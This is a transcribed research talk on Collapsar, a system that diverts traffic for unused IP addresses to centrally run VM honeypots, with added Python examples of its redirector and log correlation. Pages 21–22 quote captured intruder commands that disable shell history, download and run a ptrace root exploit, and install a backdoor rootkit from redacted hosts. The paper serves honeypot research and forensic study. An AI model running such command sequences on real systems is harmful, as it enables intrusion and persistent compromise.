Collapsar: A VM-Based Architecture for Network Attack Detention Center. Xuxian Jiang, Dongyan Xu. Department of Computer Sciences, Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University. USENIX Security 2004.


Page 1

Collapsar: A VM-Based Architecture for Network Attack Detention Center

Xuxian Jiang, Dongyan Xu

Department of Computer Sciences
Center for Education and Research in Information Assurance and Security (CERIAS)
Purdue University

USENIX Security 2004

Page 2

Outline

- Motivation
- Collapsar architecture and features
- Collapsar design, implementation, and performance
- Collapsar deployment and real-world incidents
- Conclusion and on-going work

Page 3

Motivation

- Need for network attack containment and monitoring
  - Worm outbreaks (MSBlaster, Sasser, ...)
  - Debian project servers hacked (Nov. 2003)
  - PlanetLab nodes compromised (Dec. 2003)
  - And more

Page 4

Motivation

- Promise of honeypots
  - Providing insights into intruders' motivations, tactics, and tools
  - Highly concentrated datasets with low noise
  - Low false-positive and false-negative rates
  - Discovering unknown vulnerabilities/exploitations
    - Example: CERT advisory CA-2002-01 (Solaris CDE subprocess control daemon, dtspcd)

Page 5

Current Honeypot Operation

- Individual honeypots
  - Limited local view of attacks
- Federation of distributed honeypots
  - Deploying honeypots in different networks
  - Exchanging logs and alerts
- Problems
  - Difficulties in distributed management
  - Lack of honeypot expertise
  - Inconsistency in security and management policies
    - Example: log format, sharing policy, exchange frequency

Page 6

Our Solution: Collapsar

- Based on the HoneyFarm idea of Lance Spitzner
- Achieving two (seemingly) conflicting goals
  - Distributed honeypot presence
  - Centralized honeypot operation
- Key ideas
  - Leveraging unused IP addresses in each network
  - Diverting the corresponding traffic (transparently) to a "detention" center
  - Creating VM-based honeypots in the center

Page 7

Collapsar Architecture

(Figure: an Attacker reaches unused addresses in several Production Networks; a Redirector in each production network diverts that traffic to the Collapsar Center, where the Front-End dispatches it to VM-based Honeypots, with a Correlation Engine and a Management Station alongside.)

Page 8

Comparison with Current Approaches

- Overlay-based approach (e.g., NetBait, Domino overlay)
  - Honeypots deployed in different sites
  - Logs aggregated from distributed honeypots
  - Data mining performed on the aggregated log information
  - Key difference: where the attacks take place (on-site vs. off-site)

Page 9

Comparison with Current Approaches

- Sinkhole networking approach (e.g., iSink)
  - "Dark" address space to monitor Internet abnormality and commotion (e.g., MSBlaster worms)
  - Limited interaction for better scalability
  - Key difference: contiguous large address blocks (vs. scattered addresses)

Page 10

Comparison with Current Approaches

- Low-interaction approach (e.g., honeyd, iSink)
  - Highly scalable deployment
  - Low security risks
  - Key difference: emulated services (vs. real ones)
    - Less effective at revealing unknown vulnerabilities
    - Less effective at capturing 0-day worms

Page 11

Collapsar Design

- Functional components
  - Redirector
  - Collapsar Front-End
  - Virtual honeypots
- Assurance modules
  - Logging module
  - Tarpitting module
  - Correlation module

Page 12

Functional Components: Redirector

- Running in each participating network
- Capturing traffic toward unused IP addresses
- Redirecting it to the Collapsar Front-End
- Two implementation options
  - Proxy-ARP approach
    - Longer latency
    - Minimum change to the network infrastructure
  - GRE (Generic Routing Encapsulation) approach
    - Lower latency
    - Requires router re-configuration
    - Misses attack traffic originating inside the domain (packets between hosts on the same LAN never cross the router that tunnels them)

Page 13

Functional Components: Collapsar Front-End

- Dispatching incoming traffic to different honeypots
  - Transparent bridging
- Mitigating security risks
  - Transparent firewalling
  - Packet re-writing
- Assurance module plug-ins
  - Logging modules
  - Tarpitting modules
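The Redirector and Front-End slides describe a packet path but not its mechanics. The following Python is an added example, not Collapsar's own code, that models that path offline: a proxy-ARP Redirector that claims the unused addresses of its network and tunnels what it captures to the Front-End in GRE (RFC 2784) over IPv4, and a Front-End that decapsulates, validates the IPv4 header, and dispatches on the original destination address. The class and function names, the choice of GRE as the redirector-to-front-end tunnel, the RFC 5737 documentation addresses, and the constructed packets are all assumptions of the example.

```python
"""Redirector -> Front-End path of the Collapsar design, modelled offline.
Added example, not Collapsar's code.  Assumed: the redirector claims unused
addresses via proxy ARP and tunnels captured packets to the Front-End in
GRE (RFC 2784) over IPv4; the Front-End decapsulates, validates the IPv4
header and dispatches on the ORIGINAL destination address.  Addresses are
RFC 5737 documentation ranges; every packet here is constructed in-line."""
import ipaddress
import socket
import struct

IPPROTO_GRE = 47
ETHERTYPE_IPV4 = 0x0800
IPV4_FMT = "!BBHHHBBH4s4s"      # 20-byte header, no options


def ip_checksum(data):
    """RFC 1071 one's-complement checksum; 0 when run over a valid header."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src, dst, proto, payload, ttl=64):
    """Minimal IPv4 packet with a correct header checksum."""
    fields = [0x45, 0, 20 + len(payload), 0, 0, ttl, proto, 0,
              socket.inet_aton(src), socket.inet_aton(dst)]
    fields[7] = ip_checksum(struct.pack(IPV4_FMT, *fields))
    return struct.pack(IPV4_FMT, *fields) + payload


def parse_ipv4(pkt):
    """Parse and validate an IPv4 packet; ValueError on anything malformed."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (pkt[0] & 0x0F) * 4
    total = struct.unpack("!H", pkt[2:4])[0]
    if ihl < 20 or total > len(pkt) or ip_checksum(pkt[:ihl]) != 0:
        raise ValueError("bad IPv4 header")
    return {"src": socket.inet_ntoa(pkt[12:16]),
            "dst": socket.inet_ntoa(pkt[16:20]),
            "proto": pkt[9], "payload": pkt[ihl:total]}


def gre_encap(inner, tunnel_src, tunnel_dst):
    """Outer IPv4 (proto 47) + 4-byte GRE header, then the captured packet."""
    gre = struct.pack("!HH", 0, ETHERTYPE_IPV4)   # no C/K/S bits, version 0
    return build_ipv4(tunnel_src, tunnel_dst, IPPROTO_GRE, gre + inner)


def gre_decap(outer):
    """Return (tunnel_src, inner_packet); plain RFC 2784 headers only."""
    o = parse_ipv4(outer)
    if o["proto"] != IPPROTO_GRE or len(o["payload"]) < 4:
        raise ValueError("not GRE")
    flags, ptype = struct.unpack("!HH", o["payload"][:4])
    if flags & 0x0007 or flags & 0x7000 or ptype != ETHERTYPE_IPV4:
        raise ValueError("unsupported GRE header")   # version, key, seq bits
    hdr_len = 8 if flags & 0x8000 else 4              # optional checksum word
    return o["src"], o["payload"][hdr_len:]


class Redirector:
    """Runs in a participating network and owns its unused addresses."""
    def __init__(self, unused, my_ip, frontend_ip):
        self.unused = {ipaddress.ip_address(a) for a in unused}
        self.my_ip, self.frontend_ip = my_ip, frontend_ip

    def answers_arp(self, target_ip):
        """Proxy ARP: answer only for addresses nobody in the network uses."""
        return ipaddress.ip_address(target_ip) in self.unused

    def redirect(self, pkt):
        """Tunnel packets for claimed addresses; leave all other traffic alone."""
        if not self.answers_arp(parse_ipv4(pkt)["dst"]):
            return None
        return gre_encap(pkt, self.my_ip, self.frontend_ip)


class FrontEnd:
    """Decapsulates and hands each packet to the honeypot holding its address."""
    def __init__(self, assignments):          # {unused_ip: honeypot name}
        self.assignments = dict(assignments)
        self.log = []                         # (redirector, src, dst, honeypot)

    def dispatch(self, outer):
        redirector, inner = gre_decap(outer)
        ip = parse_ipv4(inner)
        honeypot = self.assignments.get(ip["dst"])
        self.log.append((redirector, ip["src"], ip["dst"], honeypot))
        return None if honeypot is None else (honeypot, inner)  # drop unassigned
```

Two checks worth keeping in a real front-end are shown here: a packet whose original destination has no honeypot assigned is logged and dropped rather than bridged anywhere, and a tunnel packet with a corrupt IPv4 header or an unexpected GRE header (version bits, key or sequence fields) is rejected before dispatch. The proxy-ARP option sees traffic from hosts on the same LAN because the redirector answers the ARP request itself, which is exactly what the router-based GRE option misses.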

Page 14

Functional Components: Virtual Honeypots

- VM-based high-interaction honeypots
  - VMware
  - Enhanced User-Mode Linux (UML)
- Commodity OS and popular services
  - Linux, Windows, Solaris, FreeBSD
  - Apache, Samba, sendmail, named
- Capability for forensic analysis
  - System image snapshot / restoration

Page 15

Assurance Modules

- Logging module
  - Traffic logging (e.g., tcpdump, snort); where: Front-End and honeypots
  - Keystroke logging (e.g., sebek); where: honeypots
- Tarpitting module (e.g., snort-inline)
  - Mitigating security risks; where: Front-End
- Correlation module
  - Mining and correlation

Page 16

Performance Measurement

(Figure: measurement set-up. Host A sends traffic through the Redirector to the Front-End and on to honeypot H (VMware or UML) inside the Collapsar Center. Hardware: Dell PowerEdge servers (2.6GHz Xeon/2GB memory) and Dell Desktop PCs (1.8GHz Pentium 4/768MB memory).)

- Metrics
  - TCP throughput, measured with Nock (http://www.cs.wisc.edu/~zandy/p/nock)
  - ICMP latency

Page 17

Measurement Results

(Figure: TCP throughput)

Page 18

Measurement Results

(Figure: ICMP latency)

Page 19

Collapsar Deployment

- Deployed in a local environment for a two-month period in 2003
- Traffic redirected from five networks
  - Three wired LANs
  - One wireless LAN
  - One DSL network
- ~40 honeypots analyzed so far
  - Internet worms (MSBlaster, Enbiei, Nachi)
  - Interactive intrusions (Apache, Samba)
  - OS: Windows, Linux, Solaris, FreeBSD

Page 20

Incident: Apache Honeypot/VMware

- Vulnerabilities
  - Vul 1: Apache (CERT CA-2002-17)
  - Vul 2: Ptrace (CERT VU#628849)
- Time-line
  - Deployed: 23:44:03, 11/24/03
  - Compromised: 09:33:55, 11/25/03
- Attack monitoring
  - Detailed log: http://www.cs.purdue.edu/homes/jiangx/collapsar

Page 21

Incident: Apache Honeypot/VMware

1. Gaining a regular account: apache

[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`' ******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhat-release`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suse-release`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat /etc/slackware-version`; fi; uname -a; id; echo

2. Escalating to the root privilege

[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp
[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p

Page 22

Incident: Apache Honeypot/VMware

3. Installing a set of backdoors

[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985

4. Adding the ftp user and installing an IRC-based ftp server

[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTY-Release-0.53b
[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd
[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd;mkdir .logs;cd .logs
[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make
[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst
[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm
[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null &

Page 23

Incident: Windows XP Honeypot/VMware

- Vulnerability
  - RPC DCOM vulnerability (Microsoft Security Bulletin MS03-026)
- Time-line
  - Deployed: 22:10:00, 11/26/03
  - MSBlaster: 00:36:47, 11/27/03
  - Enbiei: 01:48:57, 11/27/03
  - Nachi: 07:03:55, 11/27/03

Page 24

Log Correlation: Stepping Stone

- iii.jjj.kkk.11 compromised a honeypot and installed a rootkit, which contained an ssh backdoor
- xx.yyy.zzz.3 connected to the ssh backdoor using the same password

Page 25

Log Correlation: Network Scanning

(Figure)
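The two correlation slides (stepping stone, network scanning) state what the correlation module found but not how. The Python below is an added example, not Collapsar's correlation engine, that parses keystroke records in the Sebek-style format the incident slides show and runs both correlations over constructed logs from several honeypots plus a constructed Front-End connection log. It assumes that rootkit installers are invoked as `./setup <password> <port>` (the shape of the shv4 command in the Apache incident) and that the resulting ssh backdoor appears in keystroke records under the process name `xntps` (as in that incident); the log lines, honeypot names and RFC 5737 addresses are constructed.

```python
"""Correlation-module sketch over Collapsar-style logs: Sebek-format keystroke
records from several honeypots and the Front-End's connection log.  Added
example, not Collapsar's correlation engine.  Assumed: rootkit installers run
as "./setup <password> <port>" (shape of the shv4 command on the slide) and
their ssh backdoor shows up under the process name "xntps" (as in that
incident).  All log lines are constructed; addresses are RFC 5737 ranges."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Sebek-style record, as on the slides: [date time src_ip pid process uid]cmd
KEYSTROKE_RE = re.compile(
    r"^\[(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+) (\d+) (\S+) (\d+)\](.*)$")
SETUP_RE = re.compile(r"\./setup\s+(\S+)\s+(\d+)")   # assumed installer shape
BACKDOOR_PROCS = {"xntps"}                           # assumed backdoor name

# Constructed per-honeypot keystroke logs (one list per virtual honeypot).
KEYSTROKES = {
    "hp-apache": [
        "[2003-11-25 09:33:55 192.0.2.11 7817 sh 48]export HISTFILE=/dev/null; id",
        "[2003-11-25 09:34:07 192.0.2.11 7817 sh 48]cd /tmp; gcc p.c -o p; ./p",
        "[2003-11-25 09:35:46 192.0.2.11 7838 sh 0]cd shv4; ./setup rooter 1985",
        "[2003-11-25 09:36:57 198.51.100.3 8009 xntps 0]cd /home; adduser ftpd",
        "[2003-11-25 09:38:01 198.51.100.3 8009 xntps 0]./syst -b rpm &",
    ],
    "hp-samba": [
        "[2003-11-26 02:10:12 203.0.113.9 4410 sh 0]uname -a; id",
    ],
}

# Constructed Front-End connection log: date time src dst(original) dport
CONNECTIONS = """\
2003-11-25 09:33:50 192.0.2.11 192.0.2.10 80
2003-11-25 09:36:16 198.51.100.3 192.0.2.10 1985
2003-11-27 00:36:40 203.0.113.77 192.0.2.200 135
2003-11-27 00:36:40 203.0.113.77 192.0.2.201 135
2003-11-27 00:36:41 203.0.113.77 198.51.100.50 135
2003-11-27 00:36:41 203.0.113.77 198.51.100.51 135
2003-11-27 00:40:02 203.0.113.9 198.51.100.52 139
"""


def parse_keystroke(line):
    """One Sebek-style record -> dict; ValueError on a malformed line."""
    m = KEYSTROKE_RE.match(line)
    if not m:
        raise ValueError("unrecognised keystroke record: %r" % line)
    ts, src, pid, proc, uid, cmd = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "src": src,
            "pid": int(pid), "proc": proc, "uid": int(uid), "cmd": cmd}


def find_stepping_stones(keystrokes):
    """(honeypot, installer_ip, user_ip, port): a second address drove a
    backdoor that a first address had installed as root on the same honeypot."""
    found = set()
    for hp, lines in keystrokes.items():
        recs = sorted((parse_keystroke(l) for l in lines), key=lambda r: r["ts"])
        installs = []                                  # (ts, installer, port)
        for r in recs:
            m = SETUP_RE.search(r["cmd"])
            if m and r["uid"] == 0:
                installs.append((r["ts"], r["src"], int(m.group(2))))
            elif r["proc"] in BACKDOOR_PROCS:
                for ts, installer, port in installs:
                    if r["ts"] > ts and r["src"] != installer:
                        found.add((hp, installer, r["src"], port))
    return sorted(found)


def find_scanners(conn_log, min_targets=3, window=timedelta(minutes=5)):
    """Sources that touched >= min_targets distinct honeypot addresses inside
    `window`; visible only because scattered addresses converge in the center."""
    by_src = defaultdict(list)
    for line in conn_log.splitlines():
        date, clock, src, dst, dport = line.split()
        by_src[src].append((datetime.strptime(date + " " + clock,
                                              "%Y-%m-%d %H:%M:%S"), dst))
    scanners = {}
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            targets = {dst for t, dst in events[i:] if t - t0 <= window}
            if len(targets) >= min_targets:
                scanners[src] = sorted(targets)
                break
    return scanners
```

The stepping-stone check keys on what the slide describes: a root-level installer command on one honeypot, followed by commands typed through the installed backdoor from a different source address. The scanning check only works because addresses from several production networks land in one log; on any single site 203.0.113.77 would look like one or two stray connections.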

Page 26

Conclusions

- A new architecture for attack containment and monitoring
  - Distributed presence and centralized operation of honeypots
  - Good potential in attack correlation and log mining
- Unique features
  - Aggregation of scattered unused IP addresses
  - Off-site (relative to participating networks) attack occurrences and monitoring
  - Real services for unknown vulnerability revelation

Page 27

On-going Work

- Integration into trusted server architectures (SODA and Poly2)
- On-demand honeypot customization
- Collapsar center federation
- Scalability
- Testbed for worm containment (coming soon)

Page 28

Thank you.

For more information:
Email: {dxu, jiangx}@cs.purdue.edu
URL: www.cs.purdue.edu/~dxu
Google: "Purdue Collapsar friends"